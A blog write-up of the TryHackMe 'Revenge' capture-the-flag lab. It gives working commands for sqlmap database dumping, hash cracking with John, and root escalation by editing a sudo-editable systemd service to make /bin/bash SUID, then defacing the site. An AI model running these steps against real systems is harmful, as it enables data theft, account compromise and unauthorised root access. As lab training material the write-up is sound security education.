Sign in Subscribe
TryHackMe

Revenge TryHackMe Writeup

In this article, I will be sharing a writeup of Revenge from TryHackMe. This machine is rated medium and takes us through exploiting SQL Injection to find user credentials, cracking password hashes with John and then exploiting a service to get the root shell. With that said, let's get started!

Madhav Mehndiratta

6 min read
Revenge TryHackMe Writeup

Challenge Link: https://tryhackme.com/room/revenge

Before starting the challenge, we are provided with a text file which contains some hints:

To whom it may concern,

I know it was you who hacked my blog.  I was really impressed with your skills.  You were a little sloppy 
and left a bit of a footprint so I was able to track you down.  But, thank you for taking me up on my offer.  
I've done some initial enumeration of the site because I know *some* things about hacking but not enough.  
For that reason, I'll let you do your own enumeration and checking.

What I want you to do is simple.  Break into the server that's running the website and deface the front page.  
I don't care how you do it, just do it.  But remember...DO NOT BRING DOWN THE SITE!  We don't want to cause irreparable damage.

When you finish the job, you'll get the rest of your payment.  We agreed upon $5,000.  
Half up-front and half when you finish.

Good luck,

Billy

In this we are provided with a hint that we need to deface the front page of the website in order to complete the challenge. (This will be useful in the later part of the challenge)

Initial Enumeration

I started initial enumeration by running a port scan using nmap to check for open ports and services.

┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ nmap -sC -sV -oN nmap/initial 10.10.148.29 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 14:20 IST
Nmap scan report for 10.10.148.29
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:53:b7:7a:eb:ab:22:70:1c:f7:3c:7a:c7:76:d9:89 (RSA)
|   256 43:77:00:fb:da:42:02:58:52:12:7d:cd:4e:52:4f:c3 (ECDSA)
|_  256 2b:57:13:7c:c8:4f:1d:c2:68:67:28:3f:8e:39:30:ab (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home | Rubber Ducky Inc.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds

We have only two ports open. I decided to enumerate port 80 first. Let's open our web browser and see what's running on port 80.

We have a Rubber Ducky Inc website. Next I performed a directory brute-force attack using gobuster to look for hidden directories.

┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ gobuster dir -u http://10.10.148.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.148.29
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/20 14:20:42 Starting gobuster in directory enumeration mode
===============================================================
/index               (Status: 200) [Size: 8541]
/contact             (Status: 200) [Size: 6906]
/products            (Status: 200) [Size: 7254]
/login               (Status: 200) [Size: 4980]
/admin               (Status: 200) [Size: 4983]
/static              (Status: 301) [Size: 194] [--> http://10.10.148.29/static/]
                                                                                 
===============================================================
2021/08/20 14:22:48 Finished
===============================================================

We have an /admin directory but that was not vulnerable. Next I started testing and understanding the basic functionality of the website and found that there is a /products page which is vulnerable to SQL Injection.

When we visit the URL http://10.10.148.29/products/1', we get an error message.

To exploit this, I used a tool named sqlmap. Using sqlmap, we can exploit almost all types of SQLI in an easy way.

First I dumped all the databases using the following command:

sqlmap -u "http://10.10.148.29/products/1" --batch --dbs

We can see that there is a database named duckyinc. Next we can dump all the tables inside the database using the following command:

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc --tables

We have two interesting tables named system_user and user. First I dumped the contents of the user table and there, I found some user records with their hashed passwords and our first flag.

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T user --dump

Next I dumped the system_user table and found some more users and hashed passwords.

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T system_user --dump

Next I saved all password hashes in a text file and tried to brute-force them using John The Ripper.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

Hurray! We found a password. We can use these credentials to login using SSH. After logging in, we can read our second flag present in the home directory of the user.

Next I used sudo -l command to see if the user can run any command as some other user.

*********@duckyinc:~$ sudo -l
[sudo] password for *********: 
Matching Defaults entries for ********* on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ********* may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
        /etc/systemd/system/duckyinc.service

The user can edit the duckyinc.service, so we can modify it to get the shell as user root using the following command.

sudoedit /etc/systemd/system/duckyinc.service

This will open the service in a nano editor.

We can modify this service to our own vulnerable version which will give us a root shell. This will give /bin/bash a SUID bit set.

Next we need to reset the demon and restart the service using the following commands.

sudo systemctl daemon-reload
sudo systemctl restart duckyinc.service

Now if we check the permission of /bin/bash, we can see that it is a SUID. We can run the /bin/bash -p command and this will give us the root shell.

But if we see, we do not have the root flag in /root directory. We know from the note we got that we need to deface the front page in order to complete the challenge. So let's do it!

nano /var/www/duckyinc/templates/index.html

Now if we check the /root directory again, we will get our root flag!

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Jesse Brais.